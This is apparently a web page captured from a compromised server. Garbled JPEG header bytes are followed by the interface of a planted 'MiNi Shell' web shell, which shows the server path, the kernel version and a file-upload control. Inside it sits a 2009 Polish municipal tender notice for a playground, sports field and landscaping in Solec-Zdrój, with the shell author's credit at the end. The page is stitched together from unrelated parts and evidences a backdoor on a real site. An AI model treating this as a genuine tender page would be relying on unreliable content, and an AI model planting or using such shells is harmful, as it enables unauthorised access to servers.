JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/284134-N-2009.html

<p class="kh_header"><b>Solec-Zdrój: Zagospodarowanie terenu w otoczeniu budynku GCK w Solcu - Zdroju z elementami małej architektury, utwardzeniem terenu, wykonaniem boiska sportowego i placu zabaw - Etap I.</b><br>
<b>Numer ogłoszenia: 284134 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Solec - Zdrój , ul. 1 Maja 10, 28-131 Solec-Zdrój, woj. świętokrzyskie, tel. 041 377-60-39, faks 041 3776022.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.soleczdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu w otoczeniu budynku GCK w Solcu - Zdroju z elementami małej architektury, utwardzeniem terenu, wykonaniem boiska sportowego i placu zabaw - Etap I..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Zagospodarowanie terenu w otoczeniu budynku GCK w Solcu - Zdroju z elementami małej architektury, utwardzeniem terenu, wykonaniem boiska sportowego i placu zabaw - Etap I.
1.1. Zakres zamówienia obejmuje zagospodarowanie terenu w otoczeniu Gminnego Centrum Kultury, na działkach nr ewid. 576/2, 579/1, przy ul. Partyzantów w Solcu - Zdroju. 
Inwestycja obejmuje m.in.:
- prace związane z urządzeniem terenu działek w zakresie rozbiórki istniejących i budowy nowych ciągów komunikacyjnych, 
- budowę placu zabaw oraz boiska wielofunkcyjnego wraz z ich wyposażeniem, 
- kształtowanie skarp, nasadzenia drzew, krzewów, bylin, założenia trawników, 
- wykonanie przyłącza do sieci kanalizacji deszczowej.
2. Szczegółowy opis i zakres rzeczowy przedmiotu zamówienia zawierają: 
a/ projekt budowlano - wykonawczy - Tom II SIWZ (w części dotyczącej Etapu I),
b/ przedmiar robót - Tom II SIWZ,
c/ specyfikacje techniczne wykonania i odbioru robót budowlanych - Tom III SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.10-5, 45.11.27.23-9, 45.21.22.00-8, 45.23.32.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta winna być zabezpieczona wadium wniesionym do dnia 09.09.2009r. do godz. 1100, 
w wysokości: 20 000,00 PLN (słownie: dwadzieścia tysięcy złotych).
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu;
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
3. Wadium w formie pieniężnej należy wpłacić przelewem z konta na poniżej podany rachunek bankowy: 
Urząd Gminy w Solcu - Zdroju
Nadwiślański Bank Spółdzielczy w Solcu - Zdroju
nr rachunku : 66851700070000000003900013
z dopiskiem: wadium na zadanie pn. Zagospodarowanie terenu w otoczeniu budynku GCK w Solcu - Zdroju z elementami małej architektury, utwardzeniem terenu, wykonaniem boiska sportowego i placu zabaw - Etap I.
Zamawiający będzie uważał za skuteczne wniesienie wadium tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew do dnia 09.09.2009r. do godz. 1100. 
W wymienionym przypadku przekazanie Zamawiającemu kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.

UWAGA: Oryginał dowodu wniesienia wadium należy złożyć w siedzibie Zamawiającego 
u Skarbnika Gminy pok. nr 15. W wypadku wniesienia wadium w formie pieniężnej Wykonawca złoży kopię dokonanego polecenia przelewu. 
Zamawiający otrzyma od Zamawiającego pisemne potwierdzenie złożenia dowodu wniesienia wadium.
W związku z powyższym do oferty należy załączać kserokopię dokumentu wadialnego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1)	spełniają warunki wynikające z art. 22 ust.1 ustawy, tzn.: 

1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
a) Wykonawca musi wykazać, że należycie wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie roboty budowlane, odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj. co najmniej:
- należycie wykonał minimum jedną robotę dotyczącą kompleksowej realizacji placów zabaw dla dzieci lub obiektów rekreacyjnych wyposażonych w urządzenia zabawowe dla dzieci na łącznej powierzchni min 400m2 o charakterze i złożoności podobnej do przedmiotu zamówienia. Przez kompleksową realizację należy rozumieć budowę placu zabaw lub obiektu rekreacyjnego w zakresie obejmującym: dostawę i montaż urządzeń zabawowych dla dzieci (minimum 1 urządzenie wielofunkcyjne), dostawę i montaż ławek parkowych (minimum 5 sztuk), wykonanie nawierzchni bezpiecznej (minimum 300m2), 
- należycie wykonał, co najmniej jedną robotę polegającą na kompleksowej realizacji boiska sportowego. Przez kompleksową realizację należy rozumieć budowę boiska o sztucznej nawierzchni trawiastej wraz z wyposażeniem w elementy umożliwiające uprawianie gier zespołowych - koszykówka, piłka ręczna, siatkówka oraz ogrodzeniem.
- należycie wykonał, co najmniej jedną robotę polegającą na wykonaniu nawierzchni z kostki brukowej na powierzchni min 500m2.
- należycie wykonał, co najmniej jedną robotę dotyczącą wykonania robót ogrodniczych, obejmujących posadzenie drzew i krzewów - minimum 500 szt. oraz założenie trawników na powierzchni minimum 200m2. 

b) Wykonawca musi dysponować niezbędnym do wykonania zamówienia potencjałem technicznym tj. narzędziami i urządzeniami, minimum:
- koparko-ładowarka - 1 szt.
- samochód samowyładowczy - 1 szt.
- zagęszczarka płytowa - 1 szt.
- ubijak mechaniczny - 1 szt.

c) Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia. 
- osobą z uprawnieniami budowlanymi w specjalności budowlano-konstrukcyjnej, pełniącą funkcję kierownika budowy, należącą do odpowiedniej izby samorządu zawodowego - dysponujacą aktualnym zaświadczeniem o przynależności do Izby Inżynierów Budownictwa, posiadającą stosowne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie (art. 12a, ust. 1 oraz art. 14 ust. 1 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.)), wydane na podstawie rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U z 2006 r. Nr 83, poz. 578 z późn. zm.) lub równoważne uprawnienia wydane na podstawie przepisów obowiązujących przed dniem wejścia w życie w/w rozporządzenia oraz posiadać wymagane doświadczenie zawodowe w kierowaniu robotami budowlanymi.

- osobą posiadającą wykształcenie średnie lub wyższe, kierunek - ogrodnictwo lub kształtowanie terenów zielonych pełniącą funkcję kierownika robót ogrodniczych, 

Możliwość przedstawienia pisemnych zobowiązań innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia dotyczy jedynie warunków udziału w postępowaniu, o których mowa w pkt. 1.2 b), c).

Wskazane w pkt. 1.2.c) osoby muszą posiadać biegłą znajomość języka polskiego.

1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
a) Wykonawca musi posiadać środki finansowe w wysokości co najmniej 700 000zł lub posiadać zdolność kredytową w wysokości co najmniej 700 000zł,
c) Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 1 000 000zł. 

1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Ocena spełniania wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie oświadczeń i dokumentów dołączonych przez Wykonawcę do oferty zgodnie z postanowieniami SIWZ, z zastrzeżeniem art. 26 ust. 3 i 4 Ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oferta musi zawierać niżej wymienione dokumenty i oświadczenia.
1.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu wynikających z art. 22, ust. 1:
a) oświadczenie Wykonawcy o spełnianiu warunków wynikających z art. 22 ust.1 pkt.1-3 ustawy (załącznik nr 3 do SIWZ),
b) oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania o zamówienie publiczne - art. 22 ust. 1 pkt.4 ustawy (załącznik nr 4 do SIWZ).
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w ofercie musi być złożone w/w oświadczenie przez każdego 
z Wykonawców. Oświadczenie musi być podpisane przez upoważnionego przedstawiciela. 

1.2. W celu potwierdzenia spełniania warunków udziału w postępowaniu, w zakresie 
potwierdzenia posiadania uprawnień do wykonywania określonej działalności lub czynności oraz nie podlegania wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych: 
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy P.z.p. wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
d) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy P.z.p. wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dotyczy podmiotów zbiorowych w myśl ustawy z dnia 28 października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. z 2002 r. Nr 197, poz. 1661 ze zm.). 

1.3. W celu potwierdzenia spełniania warunków udziału w postępowaniu, w zakresie posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
a) Wykonawca musi wykazać, że należycie wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie roboty budowlane, odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - tj. co najmniej:
- należycie wykonał minimum jedną robotę dotyczącą kompleksowej realizacji placów zabaw dla dzieci lub obiektów rekreacyjnych wyposażonych w urządzenia zabawowe dla dzieci na łącznej powierzchni min 400m2 o charakterze i złożoności podobnej do przedmiotu zamówienia. Przez kompleksową realizację należy rozumieć budowę placu zabaw lub obiektu rekreacyjnego w zakresie obejmującym: dostawę i montaż urządzeń zabawowych dla dzieci (minimum 1 urządzenie wielofunkcyjne), dostawę i montaż ławek parkowych (minimum 5 sztuk), wykonanie nawierzchni bezpiecznej (minimum 300m2), 
- należycie wykonał, co najmniej jedną robotę polegającą na kompleksowej realizacji boiska sportowego. Przez kompleksową realizację należy rozumieć budowę boiska o sztucznej nawierzchni trawiastej wraz z wyposażeniem w elementy umożliwiające uprawianie gier zespołowych - koszykówka, piłka ręczna, siatkówka oraz ogrodzeniem.
- należycie wykonał, co najmniej jedną robotę polegającą na wykonaniu nawierzchni z kostki brukowej na powierzchni min 500m2.
- należycie wykonał, co najmniej jedną robotę dotyczącą wykonania robót ogrodniczych, obejmujących posadzenie drzew i krzewów - minimum 500 szt. oraz założenie trawników na powierzchni minimum 200m2 - (załącznik nr 5 do SIWZ).

W celu potwierdzenia spełniania przedmiotowego warunku Wykonawcy zobowiązani są przedłożyć dokumenty potwierdzające, że roboty te zostały wykonane należycie - dokumenty zawierające, co najmniej:
- wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował roboty, których dokumenty dotyczą,
- wskazanie podmiotu, na rzecz, którego realizowane były roboty,
- wskazanie zakresu i wartości wykonanych robót,
- wskazanie daty wykonania (rozpoczęcia, zakończenia),
- wskazanie miejsca wykonania.

b) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca - (załącznik nr 6 do SIWZ).

c) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt b), Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował - (załącznikiem nr 7 do SIWZ).

d) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - (załącznik nr 8 do SIWZ),
Dotyczy osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w kierowaniu robotami budowlanymi oraz kierowaniu pracami ogrodniczymi w trakcie realizacji przedmiotowego zadania.
Należy dołączyć dokumenty potwierdzające, że wskazana osoba, do kierowania robotami budowlanymi, posiada wymagane uprawnienia tj. kopie świadectw potwierdzających nadane uprawnienia wraz z zaświadczeniem, wydanym przez właściwą izbę samorządu zawodowego, potwierdzające wpis danej osoby na listę członków właściwej izby.

e) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. d), Wykonawca wskazał osoby, którymi będzie dysponował - (załącznik nr 7 do SIWZ).

1.4. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia: 
a) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych w wysokości co najmniej 700 000zł., lub potwierdzającą zdolność kredytową Wykonawcy w wysokości co najmniej 700 000zł. wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
b) polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę co najmniej 1 000 000 PLN.

2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
2.1. Spółka cywilna (wspólnicy spółki cywilnej) będzie uważana za Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Przez spółkę cywilną należy rozumieć spółkę, 
o której mowa w art. 860-875 ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny 
(Dz. U. Nr 16, poz. 93 z późn. zm.).
2.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
2.3. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
a) Treść pełnomocnictwa musi dokładnie określać zakres umocowania.
b) Każdy z Wykonawców musi się podpisać pod pełnomocnictwem.
c) Pełnomocnictwo należy dołączyć do oferty.
2.4. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
2.3. Każdy z Wykonawców występujących wspólnie o udzielenie zamówienia musi spełniać warunki udziału w postępowaniu, o których mowa w rozdziale VII, pkt. 1.4. 
Każdy z nich nie może podlegać wykluczeniu na podstawie art. 24, ust. 1 i ust. 2 ustawy. 
Pozostałe warunki udziału w postępowaniu Wykonawcy występujący wspólnie winni spełniać łącznie.
2.4. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć oświadczenie i dokumenty wymienione w pkt. 1.1.b), w pkt. 1.2. a), b), c), d). 
Dokumenty określone w pkt. 1.1a), w pkt. 1.3. a), b), d), w pkt. 1.4. a), b) winny potwierdzać spełnianie łącznie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunków udziału w postępowaniu, do których się odnoszą. 
2.5. Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli oferta złożona przez takich Wykonawców zostanie wybrana jako najkorzystniejsza. 
Umowa ta w szczególności powinna zawierać następujące postanowienia:
- związanie się na okres nie krótszy niż czas trwania umowy na wykonanie zadania pn. robót budowlanych dla zadania pn. Zagospodarowanie terenu w otoczeniu budynku GCK w Solcu - Zdroju z elementami małej architektury, utwardzeniem terenu, wykonaniem boiska sportowego i placu zabaw - Etap I, powiększony o okres z tytułu gwarancji jakości, udzielonej przez Wykonawcę.
- wskazanie Pełnomocnika i jego umocowania do zaciągania zobowiązań, do przyjmowania płatności od Zamawiającego i do przyjmowania instrukcji na rzecz i w imieniu wszystkich Wykonawców ubiegających się o udzielenie zamówienia. 
- zapis wspólnej i solidarnej odpowiedzialności za wykonanie przedmiotu umowy i wniesienie zabezpieczenia należytego zabezpieczenia umowy, realizowanego zamówienia,
- role i zadania każdego z Wykonawców - określenie zakresu przedmiotu zamówienia - wspólnie ubiegających się o udzielenie zamówienia w wykonywaniu umowy,
- zakaz zmian w umowie bez zgody Zamawiającego,
- wykluczenie możliwości wypowiedzenia umowy między Wykonawcami wspólnie ubiegającymi się o zamówienie do czasu wykonania zamówienia.

3. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006r. Nr 87, poz. 605 z późn. zm.).

4. W przypadku złożenia przez Wykonawcę dokumentów zawierających dane w innych walutach niż PLN. Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.

5. Dołączone do oferty kopie dokumentów muszą być poświadczone za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.solec-zdroj.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - ul. 1 Maja 10, 28 - 131 Solec - Zdrój..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2009 godzina 11:00, miejsce: Siedziba Zamawiającego - ul. 1 Maja 10, 28 - 131 Solec - Zdrój, pok. 18 lub przesłać na adres Zamawiającego..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com